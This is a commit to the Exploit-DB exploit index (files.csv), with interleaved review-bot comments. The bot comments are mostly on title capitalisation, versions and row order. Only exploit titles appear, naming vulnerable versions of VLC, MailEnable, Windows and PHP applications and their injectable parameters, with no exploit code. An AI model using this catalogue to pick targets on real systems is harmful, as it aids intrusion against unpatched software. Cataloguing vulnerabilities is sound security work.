DB: 2016-11-16

8 new exploits

MailEnable Professional/Enterprise 2.35 - Out of Bounds Denial of Service
MailEnable Professional/Enterprise 2.35 - Out of Bounds Denial Of Service

MailEnable Professional/Enterprise 2.37 - Denial of Service
MailEnable Professional/Enterprise 2.37 - Denial Of Service

Galaxy FTP Server 1.0 - (Neostrada Livebox DSL Router) Denial of Service
Galaxy FTP Server 1.0 - (Neostrada Livebox DSL Router) Denial Of Service

MailEnable SMTP Service - VRFY/EXPN Command Buffer Overflow Denial of Service
MailEnable 3.13 SMTP Service - 'VRFY/EXPN' Command Denial Of Service

VideoLAN VLC Media Player - Subtitle StripTags() Function Memory Corruption
VideoLAN VLC Media Player 1.1 - Subtitle StripTags() Function Memory Corruption

VideoLAN VLC Media Player - XSPF Local File Integer Overflow in XSPF Playlist parser
VideoLAN VLC Media Player 1.1.9 - XSPF Local File Integer Overflow in XSPF Playlist parser

VideoLAN VLC Media Player - '.3gp' File Divide-by-Zero Denial of Service
VideoLAN VLC Media Player 2.0.2 - '.3gp' File Divide-by-Zero Denial Of Service

VideoLAN VLC Media Player - '.wav' File Memory Corruption
VideoLAN VLC Media Player 2.1.3 - '.wav' File Memory Corruption
Microsoft Edge 11.0.10240.16384 - 'edgehtml' CAttr­Array::Destroy Use-After-Free
Linux Kernel (Ubuntu / RedHat) - 'keyctl' Null Pointer Dereference
Microsoft Windows Kernel - Registry Hive Loading 'nt!RtlEqualSid' Out-of-Bounds Read (MS16-138)

VideoLAN VLC Media Player - '.TY' File Stack Based Buffer Overflow
VideoLAN VLC Media Player 0.9.4 - '.TY' File Stack Based Buffer Overflow

VideoLAN VLC Media Player - 'wintab32.dll' DLL Hijacking
VideoLAN VLC Media Player 1.1.3 - 'wintab32.dll' DLL Hijacking

VideoLAN VLC Media Player - TiVo Buffer Overflow (Metasploit)
VideoLAN VLC Media Player 0.9.4 - TiVo Buffer Overflow (Metasploit)

VideoLAN VLC Media Player - MKV Memory Corruption (Metasploit)
VideoLAN VLC Media Player 1.1.6 - 'MKV' Memory Corruption (Metasploit)

VideoLAN VLC Media Player - RealText Subtitle Overflow (Metasploit)
VideoLAN VLC Media Player 0.9.5 - RealText Subtitle Overflow (Metasploit)
Microsoft Windows - VHDMP ZwDeleteFile Arbitrary File Deletion Privilege Escalation (MS16-138)
Microsoft Windows - VHDMP Arbitrary File Creation Privilege Escalation (MS16-138)

Microsoft Windows - VHDMP Arbitrary Physical Disk Cloning Privilege Escalation (MS16-138)

MailEnable Pro/Ent 2.37 - (APPEND) Remote Buffer Overflow
MailEnable Professional/Enterprise 2.37 - 'APPEND' Remote Buffer Overflow

Versant Object Database 7.0.1.3 - Commands Execution Exploit
Versant Object Database 7.0.1.3 - Commands Execution

VHCS 2.4.7.1 - (vhcs2_daemon) Remote Root Exploit
VHCS 2.4.7.1 - 'vhcs2_daemon' Remote Root Exploit
MDaemon IMAP server 9.6.4 - (FETCH) Remote Buffer Overflow
MailEnable Pro/Ent 3.13 - (Fetch) Authenticated Remote Buffer Overflow
MDaemon IMAP server 9.6.4 - 'FETCH' Remote Buffer Overflow
MailEnable Professional/Enterprise 3.13 - 'Fetch' Authenticated Remote Buffer Overflow

VideoLAN VLC Media Player - AMV Dangling Pointer (Metasploit)
VideoLAN VLC Media Player 1.1.4 - 'AMV' Dangling Pointer (Metasploit)

VideoLAN VLC Media Player - ModPlug ReadS3M Stack Buffer Overflow (Metasploit)
VideoLAN VLC Media Player 1.1.8 - ModPlug ReadS3M Stack Buffer Overflow (Metasploit)

VideoLAN VLC Media Player - Mms Stream Handling Buffer Overflow (Metasploit)
VideoLAN VLC Media Player 2.0.0 - Mms Stream Handling Buffer Overflow (Metasploit)

Easy Internet Sharing Proxy Server 2.2 - SEH Overflow (Metasploit)

Disk Pulse Enterprise 9.0.34 - Buffer Overflow
Disk Pulse Enterprise 9.0.34 - 'Login' Buffer Overflow

Disk Pulse Enterprise - Login Buffer Overflow' (Metasploit)
Disk Pulse Enterprise 9.0.34 - 'Login' Buffer Overflow' (Metasploit)

WinaXe 7.7 FTP Client - Remote Buffer Overflow (Metasploit)

phpMyNewsletter 0.6.10 - (customize.php l) Remote File Inclusion
phpMyNewsletter 0.6.10 - 'customize.php' Remote File Inclusion
QuickTalk forum 1.3 - 'lang' Local File Inclusion
QuickTicket 1.2 - (qti_checkname.php) Local File Inclusion
QuickTalk forum 1.3 - 'lang' Parameter Local File Inclusion
QuickTicket 1.2 - 'qti_checkname.php' Local File Inclusion
Mambo Component com_Musica - 'id' SQL Injection
phpArcadeScript 3.0RC2 - (userid) SQL Injection
phpComasy 0.8 - (mod_project_id) SQL Injection
Dynamic photo Gallery 1.02 - 'albumID' SQL Injection
Mambo Component com_Musica - 'id' Parameter SQL Injection
phpArcadeScript 3.0RC2 - 'userid' Parameter SQL Injection
phpComasy 0.8 - 'mod_project_id' Parameter SQL Injection
Dynamic photo Gallery 1.02 - 'albumID' Parameter SQL Injection
XOOPS Module Glossario 2.2 - 'sid' SQL Injection
XOOPS Module wfdownloads - 'cid' SQL Injection
XOOPS Module Glossario 2.2 - 'sid' Parameter SQL Injection
XOOPS Module wfdownloads - 'cid' Parameter SQL Injection
Joomla! Component Candle 1.0 - (cID) SQL Injection
QuickTicket 1.5 - (qti_usr.php id) SQL Injection
Joomla! Component Candle 1.0 - 'cid' Parameter SQL Injection
QuickTicket 1.5 - 'qti_usr.php' SQL Injection
Mambo Component eWriting 1.2.1 - (cat) SQL Injection
phpMyNewsletter 0.8b5 - (archives.php msg_id) SQL Injection
Mapbender 2.4.4 - (mapFiler.php) Remote Code Execution
Mapbender 2.4.4 - (gaz) SQL Injection
Mambo Component eWriting 1.2.1 - 'cat' Parameter SQL Injection
phpMyNewsletter 0.8b5 - 'msg_id' Parameter SQL Injection
Mapbender 2.4.4 - 'mapFiler.php' Remote Code Execution
Mapbender 2.4.4 - 'gaz' Parameter SQL Injection

phpBB Mod FileBase - 'id' SQL Injection
phpBB Mod FileBase 2.0 - 'id' Parameter SQL Injection
XOOPS Module Gallery 0.2.2 - (gid) SQL Injection
XOOPS Module My_eGallery 3.04 - (gid) SQL Injection
XOOPS Module Gallery 0.2.2 - 'gid' Parameter SQL Injection
XOOPS Module My_eGallery 3.04 - 'gid' Parameter SQL Injection

XOOPS Module tutorials - 'printpage.php' SQL Injection
XOOPS Module tutorials 2.1b - 'printpage.php' SQL Injection

easygallery 5.0tr - Multiple Vulnerabilities
EasyGallery 5.0tr - Multiple Vulnerabilities

phpArcadeScript 4 - (cat) SQL Injection
phpArcadeScript 4 - 'cat' Parameter SQL Injection

phpComasy 0.9.1 - (entry_id) SQL Injection
phpComasy 0.9.1 - 'entry_id' Parameter SQL Injection

phpArcadeScript 4.0 - (linkout.php id) SQL Injection
phpArcadeScript 4.0 - 'id' Parameter SQL Injection

Myiosoft EasyGallery - 'catid' Blind SQL Injection
EasyGallery - 'catid' Parameter Blind SQL Injection
phpArcadeScript 2.0 - tellafriend.php gamename Parameter Cross-Site Scripting
phpArcadeScript 2.0 - loginbox.php login_status Parameter Cross-Site Scripting
phpArcadeScript 2.0 - 'index.php' submissionstatus Parameter Cross-Site Scripting
phpArcadeScript 2.0 - browse.php Multiple Parameter Cross-Site Scripting
phpArcadeScript 2.0 - displaygame.php gamefile Parameter Cross-Site Scripting

EasyGallery 1.17 - EasyGallery.php Cross-Site Scripting

Bloo 1.00 - Googlespell_Proxy.php Cross-Site Scripting

Mitra Informatika Solusindo Cart - 'p' Parameter SQL Injection
Offensive Security 2016-11-16 05:01:23 +00:00
parent c27aa131c8
commit 2e7215ec08
17 changed files with 2187 additions and 124 deletions

110
files.csv

@ -500,9 +500,9 @@ id,file,description,date,author,platform,type,port
3289,platforms/linux/dos/3289.c,"Axigen 2.0.0b1 - Remote Denial of Service (1)",2007-02-08,mu-b,linux,dos,0
3290,platforms/linux/dos/3290.c,"Axigen 2.0.0b1 - Remote Denial of Service (2)",2007-02-08,mu-b,linux,dos,0
3304,platforms/windows/dos/3304.py,"MiniWebsvr 0.0.6 - Remote Resource Consumption Denial of Service",2007-02-13,shinnai,windows,dos,0
3306,platforms/windows/dos/3306.pl,"MailEnable Professional/Enterprise 2.35 - Out of Bounds Denial of Service",2007-02-14,mu-b,windows,dos,0
3306,platforms/windows/dos/3306.pl,"MailEnable Professional/Enterprise 2.35 - Out of Bounds Denial Of Service",2007-02-14,mu-b,windows,dos,0
3307,platforms/windows/dos/3307.html,"ActSoft DVD-Tools - 'dvdtools.ocx' Remote Buffer Overflow (PoC)",2007-02-14,shinnai,windows,dos,0
3308,platforms/windows/dos/3308.pl,"MailEnable Professional/Enterprise 2.37 - Denial of Service",2007-02-14,mu-b,windows,dos,0
3308,platforms/windows/dos/3308.pl,"MailEnable Professional/Enterprise 2.37 - Denial Of Service",2007-02-14,mu-b,windows,dos,0
3331,platforms/windows/dos/3331.c,"VicFTPS < 5.0 - (CWD) Remote Buffer Overflow (PoC)",2007-02-18,r0ut3r,windows,dos,0
3341,platforms/windows/dos/3341.cpp,"TurboFTP Server 5.30 Build 572 - 'newline/LIST' Multiple Remote Denial of Service",2007-02-20,Marsu,windows,dos,0
3343,platforms/windows/dos/3343.cpp,"FTP Voyager 14.0.0.3 - (CWD) Remote Stack Overflow (PoC)",2007-02-20,Marsu,windows,dos,0
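Review bot: the updated 3306 and 3308 rows change "Denial of Service" to "Denial Of Service", which breaks with the capitalisation every other row in this hunk uses (3289, 3290, 3304 and 3341 all read "Denial of Service"); keep the lowercase "of" so the titles remain searchable as one string, e.g. "MailEnable Professional/Enterprise 2.35 - Out of Bounds Denial of Service".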
@ -700,11 +700,11 @@ id,file,description,date,author,platform,type,port
5184,platforms/windows/dos/5184.py,"MyServer 0.8.11 - '204 No Content' error Remote Denial of Service",2008-02-25,shinnai,windows,dos,0
5191,platforms/multiple/dos/5191.c,"Apple Mac OSX xnu 1228.3.13 - IPv6-ipcomp Remote kernel Denial of Service (PoC)",2008-02-26,mu-b,multiple,dos,0
5201,platforms/windows/dos/5201.txt,"Crysis 1.1.1.5879 - Remote Format String Denial of Service (PoC)",2008-02-28,"Long Poke",windows,dos,0
5210,platforms/linux/dos/5210.c,"Galaxy FTP Server 1.0 - (Neostrada Livebox DSL Router) Denial of Service",2008-03-01,0in,linux,dos,0
5210,platforms/linux/dos/5210.c,"Galaxy FTP Server 1.0 - (Neostrada Livebox DSL Router) Denial Of Service",2008-03-01,0in,linux,dos,0
5217,platforms/windows/dos/5217.html,"ICQ Toolbar 2.3 - ActiveX Remote Denial of Service",2008-03-06,spdr,windows,dos,0
5225,platforms/windows/dos/5225.html,"KingSoft - 'UpdateOcx2.dll' SetUninstallName() Heap Overflow (PoC)",2008-03-10,void,windows,dos,0
5229,platforms/multiple/dos/5229.txt,"asg-sentry 7.0.0 - Multiple Vulnerabilities",2008-03-10,"Luigi Auriemma",multiple,dos,0
5235,platforms/windows/dos/5235.py,"MailEnable SMTP Service - VRFY/EXPN Command Buffer Overflow Denial of Service",2008-03-11,ryujin,windows,dos,0
5235,platforms/windows/dos/5235.py,"MailEnable 3.13 SMTP Service - 'VRFY/EXPN' Command Denial Of Service",2008-03-11,ryujin,windows,dos,0
5258,platforms/solaris/dos/5258.c,"SunOS 5.10 Sun Cluster - rpc.metad Denial of Service (PoC)",2008-03-14,kingcope,solaris,dos,0
5261,platforms/windows/dos/5261.py,"Rosoft Media Player 4.1.8 - RML Stack Based Buffer Overflow (PoC)",2008-03-15,"Wiktor Sierocinski",windows,dos,0
5268,platforms/multiple/dos/5268.html,"Apple Safari (webkit) (iPhone/OSX/Windows) - Remote Denial of Service",2008-03-17,"Georgi Guninski",multiple,dos,0
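Review bot: the new 5235 row drops "Buffer Overflow" from the description while adding the version, so the row no longer names the vulnerability class the old title carried; suggest keeping it, e.g. "MailEnable 3.13 SMTP Service - 'VRFY/EXPN' Command Buffer Overflow Denial of Service". The 5210 and 5235 rows also switch to "Denial Of Service" while 5217 and 5258 in the same hunk keep "Denial of Service".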
@ -1878,7 +1878,7 @@ id,file,description,date,author,platform,type,port
16079,platforms/multiple/dos/16079.html,"Google Chrome 8.0.552.237 - replace Denial of Service",2011-01-30,"Carlos Mario Penagos Hollmann",multiple,dos,0
16084,platforms/windows/dos/16084.html,"Maxthon Browser 3.0.20.1000 - ref / replace Denial of Service",2011-01-30,"Carlos Mario Penagos Hollmann",windows,dos,0
16095,platforms/linux/dos/16095.pl,"Terminal Server Client - '.rdp' Denial of Service",2011-02-02,"D3V!L FUCKER",linux,dos,0
16108,platforms/multiple/dos/16108.txt,"VideoLAN VLC Media Player - Subtitle StripTags() Function Memory Corruption",2011-02-03,"Harry Sintonen",multiple,dos,0
16108,platforms/multiple/dos/16108.txt,"VideoLAN VLC Media Player 1.1 - Subtitle StripTags() Function Memory Corruption",2011-02-03,"Harry Sintonen",multiple,dos,0
16120,platforms/windows/dos/16120.py,"Hanso Player 1.4.0.0 - Buffer Overflow Denial of Service Skinfile",2011-02-06,badc0re,windows,dos,0
16121,platforms/windows/dos/16121.py,"Hanso Converter 1.1.0 - BufferOverflow Denial of Service",2011-02-06,badc0re,windows,dos,0
16129,platforms/linux/dos/16129.txt,"ProFTPd mod_sftp - Integer Overflow Denial of Service (PoC)",2011-02-07,kingcope,linux,dos,0
@ -1965,7 +1965,7 @@ id,file,description,date,author,platform,type,port
17353,platforms/hardware/dos/17353.pl,"Brother HL-5370DW - series Authentication Bypass printer flooder",2011-05-31,chrisB,hardware,dos,0
18716,platforms/windows/dos/18716.txt,"BulletProof FTP Client 2010 - Buffer Overflow",2012-04-08,Vulnerability-Lab,windows,dos,0
17363,platforms/windows/dos/17363.pl,"1ClickUnzip 3.00 - '.zip' Heap Overflow",2011-06-06,"C4SS!0 G0M3S",windows,dos,0
17372,platforms/windows/dos/17372.txt,"VideoLAN VLC Media Player - XSPF Local File Integer Overflow in XSPF Playlist parser",2011-06-08,TecR0c,windows,dos,0
17372,platforms/windows/dos/17372.txt,"VideoLAN VLC Media Player 1.1.9 - XSPF Local File Integer Overflow in XSPF Playlist parser",2011-06-08,TecR0c,windows,dos,0
17455,platforms/windows/dos/17455.rb,"SmallFTPd 1.0.3 - Denial of Service",2011-06-27,"Myo Soe",windows,dos,0
17387,platforms/windows/dos/17387.html,"UUSEE ActiveX < 6.11.0412.1 - Buffer Overflow",2011-06-11,huimaozi,windows,dos,0
17396,platforms/windows/dos/17396.html,"Opera Web Browser 11.11 - Remote Crash",2011-06-14,echo,windows,dos,0
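Review bot: the updated 17372 title still says "XSPF" twice ("XSPF Local File Integer Overflow in XSPF Playlist parser") and leaves "parser" in lowercase, unlike the title case of the neighbouring rows; since the row is being rewritten anyway, consider "VideoLAN VLC Media Player 1.1.9 - '.xspf' Playlist Parser Integer Overflow".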
@ -4572,7 +4572,7 @@ id,file,description,date,author,platform,type,port
37538,platforms/linux/dos/37538.py,"ISC DHCP 4.x - Multiple Denial of Service Vulnerabilities",2012-07-25,"Markus Hietava",linux,dos,0
37558,platforms/windows/dos/37558.txt,"Notepad++ 6.7.3 - Crash (PoC)",2015-07-10,"Rahul Pratap Singh",windows,dos,0
37562,platforms/multiple/dos/37562.pl,"NTPD - MON_GETLIST Query Amplification Denial of Service",2015-07-10,"Todor Donev",multiple,dos,123
37568,platforms/windows/dos/37568.pl,"VideoLAN VLC Media Player - '.3gp' File Divide-by-Zero Denial of Service",2012-08-02,Dark-Puzzle,windows,dos,0
37568,platforms/windows/dos/37568.pl,"VideoLAN VLC Media Player 2.0.2 - '.3gp' File Divide-by-Zero Denial Of Service",2012-08-02,Dark-Puzzle,windows,dos,0
37593,platforms/windows/dos/37593.py,"Full Player 8.2.1 - Memory Corruption (PoC)",2015-07-13,"SATHISH ARTHAR",windows,dos,0
37607,platforms/windows/dos/37607.py,"Internet Download Manager - '.ief' Crash (PoC)",2015-07-14,"Mohammad Reza Espargham",windows,dos,0
37608,platforms/windows/dos/37608.py,"Internet Download Manager - (Find Download) Crash (PoC)",2015-07-14,"Mohammad Reza Espargham",windows,dos,0
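Review bot: the updated 37568 row switches "Denial of Service" to "Denial Of Service" while 37538 and 37562 a few lines above keep "Denial of Service"; keep the lowercase "of" when adding the 2.0.2 version.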
@ -4910,7 +4910,7 @@ id,file,description,date,author,platform,type,port
39164,platforms/multiple/dos/39164.txt,"pdfium IsFlagSet (v8 memory management) - SIGSEGV Exploit",2016-01-04,"Google Security Research",multiple,dos,0
39165,platforms/multiple/dos/39165.txt,"pdfium - CPDF_Function::Call Stack Based Buffer Overflow",2016-01-04,"Google Security Research",multiple,dos,0
39169,platforms/multiple/dos/39169.pl,"Ganeti - Multiple Vulnerabilities",2016-01-05,"Pierre Kim",multiple,dos,0
39177,platforms/multiple/dos/39177.py,"VideoLAN VLC Media Player - '.wav' File Memory Corruption",2014-05-09,"Aryan Bayaninejad",multiple,dos,0
39177,platforms/multiple/dos/39177.py,"VideoLAN VLC Media Player 2.1.3 - '.wav' File Memory Corruption",2014-05-09,"Aryan Bayaninejad",multiple,dos,0
39180,platforms/windows/dos/39180.pl,"Winamp - '.flv' File Processing Memory Corruption",2014-05-16,"Aryan Bayaninejad",windows,dos,0
39181,platforms/windows/dos/39181.py,"Intel Indeo - Video Memory Corruption",2014-05-16,"Aryan Bayaninejad",windows,dos,0
39182,platforms/multiple/dos/39182.py,"RealPlayer - '.3gp' File Processing Memory Corruption",2014-05-16,"Aryan Bayaninejad",multiple,dos,0
@ -5262,6 +5262,9 @@ id,file,description,date,author,platform,type,port
40745,platforms/windows/dos/40745.c,"Microsoft Windows Kernel - win32k Denial of Service (MS16-135)",2016-11-09,TinySec,windows,dos,0
40747,platforms/windows/dos/40747.html,"Microsoft WININET.dll - CHttp­Header­Parser::Parse­Status­Line Out-of-Bounds Read (MS16-104/MS16-105)",2016-11-10,Skylined,windows,dos,0
40748,platforms/windows/dos/40748.html,"Microsoft Internet Explorer 9<11 MSHTML - PROPERTYDESC::Handle­Style­Component­Property Out-of-Bounds Read (MS16-104)",2016-11-10,Skylined,windows,dos,0
40761,platforms/windows/dos/40761.html,"Microsoft Edge 11.0.10240.16384 - 'edgehtml' CAttr­Array::Destroy Use-After-Free",2016-11-15,Skylined,windows,dos,0
40762,platforms/linux/dos/40762.c,"Linux Kernel (Ubuntu / RedHat) - 'keyctl' Null Pointer Dereference",2016-11-15,"OpenSource Security",linux,dos,0
40766,platforms/windows/dos/40766.txt,"Microsoft Windows Kernel - Registry Hive Loading 'nt!RtlEqualSid' Out-of-Bounds Read (MS16-138)",2016-11-15,"Google Security Research",windows,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (Redhat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
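Review bot: the new 40761 description appears to carry invisible soft-hyphen characters (U+00AD) between "CAttr" and "Array" in "CAttr­Array::Destroy", the same artefact visible in the neighbouring 40747 and 40748 rows; these survive copy-paste and make an exact search for "CAttrArray::Destroy" miss the row, so strip them before merging.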
@ -5844,7 +5847,7 @@ id,file,description,date,author,platform,type,port
6705,platforms/windows/local/6705.txt,"Microsoft Windows 2003 - Token Kidnapping Local Exploit (PoC)",2008-10-08,"Cesar Cerrudo",windows,local,0
6757,platforms/windows/local/6757.txt,"Microsoft Windows 2003/XP - 'afd.sys' Privilege Escalation (K-plugin)",2008-10-15,"Ruben Santamarta",windows,local,0
6787,platforms/windows/local/6787.pl,"BitTorrent 6.0.3 - '.torrent' Stack Buffer Overflow",2008-10-19,"Guido Landi",windows,local,0
6798,platforms/windows/local/6798.pl,"VideoLAN VLC Media Player - '.TY' File Stack Based Buffer Overflow",2008-10-21,"Guido Landi",windows,local,0
6798,platforms/windows/local/6798.pl,"VideoLAN VLC Media Player 0.9.4 - '.TY' File Stack Based Buffer Overflow",2008-10-21,"Guido Landi",windows,local,0
6825,platforms/windows/local/6825.pl,"VideoLAN VLC Media Player 0.9.4 - '.ty' Buffer Overflow (SEH)",2008-10-23,"Guido Landi",windows,local,0
6831,platforms/windows/local/6831.cpp,"TugZip 3.00 Archiver - '.zip' Local Buffer Overflow",2008-10-24,"fl0 fl0w",windows,local,0
6851,platforms/linux/local/6851.c,"Linux Kernel < 2.6.22 - 'ftruncate()/open()' Privilege Escalation",2008-10-27,gat3way,linux,local,0
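Review bot: the updated 6798 row now matches 6825 on the version (0.9.4) but not on the extension case, "'.TY'" versus "'.ty'"; the two rows describe the same file format, so normalise one of them, preferably to the lowercase form the rest of this hunk uses ('.torrent', '.zip').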
@ -6453,7 +6456,7 @@ id,file,description,date,author,platform,type,port
14741,platforms/windows/local/14741.c,"Adobe Photoshop CS2 - 'Wintab32.dll' DLL Hijacking",2010-08-25,storm,windows,local,0
14743,platforms/windows/local/14743.c,"Avast! 5.0.594 - 'mfc90loc.dll' License Files DLL Hijacking",2010-08-25,diwr,windows,local,0
14748,platforms/windows/local/14748.txt,"uTorrent - DLL Hijacking",2010-08-25,Dr_IDE,windows,local,0
14750,platforms/windows/local/14750.txt,"VideoLAN VLC Media Player - 'wintab32.dll' DLL Hijacking",2010-08-25,Secfence,windows,local,0
14750,platforms/windows/local/14750.txt,"VideoLAN VLC Media Player 1.1.3 - 'wintab32.dll' DLL Hijacking",2010-08-25,Secfence,windows,local,0
14751,platforms/windows/local/14751.txt,"Microsoft Vista - 'fveapi.dll' BitLocker Drive Encryption API Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0
14752,platforms/windows/local/14752.c,"Roxio Photosuite 9 - 'homeutils9.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0
14756,platforms/windows/local/14756.c,"Apple Safari 5.0.1 - 'dwmapi.dll' DLL Hijacking",2010-08-25,Secfence,windows,local,0
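Review bot: the updated 14750 row keeps "'wintab32.dll'" in lowercase while the 14741 row in the same hunk spells the same library "'Wintab32.dll'"; pick one spelling for both so a search on the DLL name returns both rows.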
@ -6633,13 +6636,13 @@ id,file,description,date,author,platform,type,port
16626,platforms/windows/local/16626.rb,"Audiotran 1.4.1 - '.pls' Stack Buffer Overflow (Metasploit)",2010-01-28,Metasploit,windows,local,0
16627,platforms/windows/local/16627.rb,"UltraISO - '.cue' File Parsing Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0
16628,platforms/windows/local/16628.rb,"Fat Player Media Player 0.6b0 - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
16629,platforms/windows/local/16629.rb,"VideoLAN VLC Media Player - TiVo Buffer Overflow (Metasploit)",2011-02-02,Metasploit,windows,local,0
16629,platforms/windows/local/16629.rb,"VideoLAN VLC Media Player 0.9.4 - TiVo Buffer Overflow (Metasploit)",2011-02-02,Metasploit,windows,local,0
16631,platforms/windows/local/16631.rb,"HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (3)",2010-09-25,Metasploit,windows,local,0
16632,platforms/windows/local/16632.rb,"ACDSee - '.XPM' File Section Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
16633,platforms/windows/local/16633.rb,"Steinberg MyMP3Player 3.0 - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
16634,platforms/windows/local/16634.rb,"Free Download Manager - Torrent Parsing Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
16636,platforms/windows/local/16636.rb,"Millenium MP3 Studio 2.0 - '.pls' Stack Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0
16637,platforms/windows/local/16637.rb,"VideoLAN VLC Media Player - MKV Memory Corruption (Metasploit)",2011-02-08,Metasploit,windows,local,0
16637,platforms/windows/local/16637.rb,"VideoLAN VLC Media Player 1.1.6 - 'MKV' Memory Corruption (Metasploit)",2011-02-08,Metasploit,windows,local,0
16640,platforms/windows/local/16640.rb,"feedDemon 3.1.0.12 - Stack Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
16642,platforms/windows/local/16642.rb,"WM Downloader 3.1.2.2 - Buffer Overflow (2)",2010-11-11,Metasploit,windows,local,0
16643,platforms/windows/local/16643.rb,"SafeNet SoftRemote - GROUPNAME Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0
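Review bot: the updated 16637 row adds quotes around MKV ("'MKV' Memory Corruption") but the updated 16629 row in the same hunk leaves "TiVo Buffer Overflow" unquoted, and the surrounding rows reserve quotes for file extensions written with a leading dot ('.pls', '.cue', '.XPM'); either quote both as formats ("'.mkv' File Memory Corruption") or leave both unquoted.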
@ -6830,7 +6833,7 @@ id,file,description,date,author,platform,type,port
18515,platforms/windows/local/18515.rb,"Orbit Downloader - URL Unicode Conversion Overflow (Metasploit)",2012-02-23,Metasploit,windows,local,0
18547,platforms/windows/local/18547.rb,"DJ Studio Pro 5.1 - '.pls' Stack Buffer Overflow (Metasploit)",2012-03-02,Metasploit,windows,local,0
18533,platforms/windows/local/18533.txt,"Socusoft Photo 2 Video 8.05 - Buffer Overflow",2012-02-27,Vulnerability-Lab,windows,local,0
18548,platforms/windows/local/18548.rb,"VideoLAN VLC Media Player - RealText Subtitle Overflow (Metasploit)",2012-03-02,Metasploit,windows,local,0
18548,platforms/windows/local/18548.rb,"VideoLAN VLC Media Player 0.9.5 - RealText Subtitle Overflow (Metasploit)",2012-03-02,Metasploit,windows,local,0
18611,platforms/windows/local/18611.rb,"RM Downloader 3.1.3.3.2010.06.26 - '.m3u' Buffer Overflow (Metasploit)",2012-03-16,KaHPeSeSe,windows,local,0
18656,platforms/windows/local/18656.pl,"mmPlayer 2.2 - '.m3u' Local Buffer Overflow (SEH)",2012-03-23,"RjRjh Hack3r",windows,local,0
18657,platforms/windows/local/18657.pl,"mmPlayer 2.2 - '.ppl' Local Buffer Overflow (SEH)",2012-03-23,"RjRjh Hack3r",windows,local,0
@ -7946,6 +7949,8 @@ id,file,description,date,author,platform,type,port
27316,platforms/windows/local/27316.py,"Easy LAN Folder Share 3.2.0.100 - Buffer Overflow (SEH)",2013-08-03,sagi-,windows,local,0
27334,platforms/php/local/27334.txt,"PHP 4.x/5.0/5.1 with Sendmail Mail Function - additional_parameters Argument Arbitrary File Creation",2006-02-28,ced.clerget@free.fr,php,local,0
27335,platforms/php/local/27335.txt,"PHP 4.x/5.0/5.1 - mb_send_mail() Function Parameter Restriction Bypass",2006-02-28,ced.clerget@free.fr,php,local,0
40764,platforms/windows/local/40764.cs,"Microsoft Windows - VHDMP ZwDeleteFile Arbitrary File Deletion Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0
40763,platforms/windows/local/40763.cs,"Microsoft Windows - VHDMP Arbitrary File Creation Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0
27461,platforms/linux/local/27461.c,"Linux Kernel 2.4.x/2.5.x/2.6.x - Sockaddr_In.Sin_Zero Kernel Memory Disclosure Vulnerabilities",2006-03-23,"Pavel Kankovsky",linux,local,0
27609,platforms/windows/local/27609.rb,"Chasys Draw IES - Buffer Overflow (Metasploit)",2013-08-15,Metasploit,windows,local,0
27766,platforms/linux/local/27766.txt,"Linux Kernel 2.6.x - SMBFS CHRoot Security Restriction Bypass",2006-04-28,"Marcel Holtmann",linux,local,0
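Review bot: the two rows added after 27335 are out of id order (40764 before 40763) and sit among 273xx entries rather than at the end of the local section, where the third VHDMP row of this commit (40765) is appended; swap them and move them next to 40765 so the three MS16-138 entries stay together and the file keeps its roughly ascending id order.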
@ -8631,6 +8636,7 @@ id,file,description,date,author,platform,type,port
40710,platforms/aix/local/40710.sh,"IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Privilege Escalation",2016-11-04,"Hector X. Monsegur",aix,local,0
40759,platforms/linux/local/40759.rb,"Linux Kernel 4.4 (Ubuntu 16.04) - BPF Local Privilege Escalation (Metasploit)",2016-11-14,Metasploit,linux,local,0
40741,platforms/windows/local/40741.py,"Avira Antivirus 15.0.21.86 - '.zip' Directory Traversal / Command Execution",2016-11-08,R-73eN,windows,local,0
40765,platforms/windows/local/40765.cs,"Microsoft Windows - VHDMP Arbitrary Physical Disk Cloning Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
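Review bot: 40765 is appended at the end of the local section, which is the right place, but its siblings 40763 and 40764 from the same MS16-138 VHDMP set are inserted elsewhere in this commit (after 27335); keep the three rows adjacent here so they can be reviewed and maintained together.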
@ -9246,7 +9252,7 @@ id,file,description,date,author,platform,type,port
3389,platforms/linux/remote/3389.c,"Madwifi 0.9.2.1 - WPA/RSN IE Remote Kernel Buffer Overflow",2007-03-01,"Massimiliano Oldani",linux,remote,0
3391,platforms/windows/remote/3391.py,"Snort 2.6.1 - DCE/RPC Preprocessor Remote Buffer Overflow",2007-03-01,"Trirat Puttaraksa",windows,remote,0
3395,platforms/windows/remote/3395.c,"WebMod 0.48 - (Content-Length) Remote Buffer Overflow (PoC)",2007-03-01,cybermind,windows,remote,0
3397,platforms/windows/remote/3397.pl,"MailEnable Pro/Ent 2.37 - (APPEND) Remote Buffer Overflow",2007-03-02,mu-b,windows,remote,143
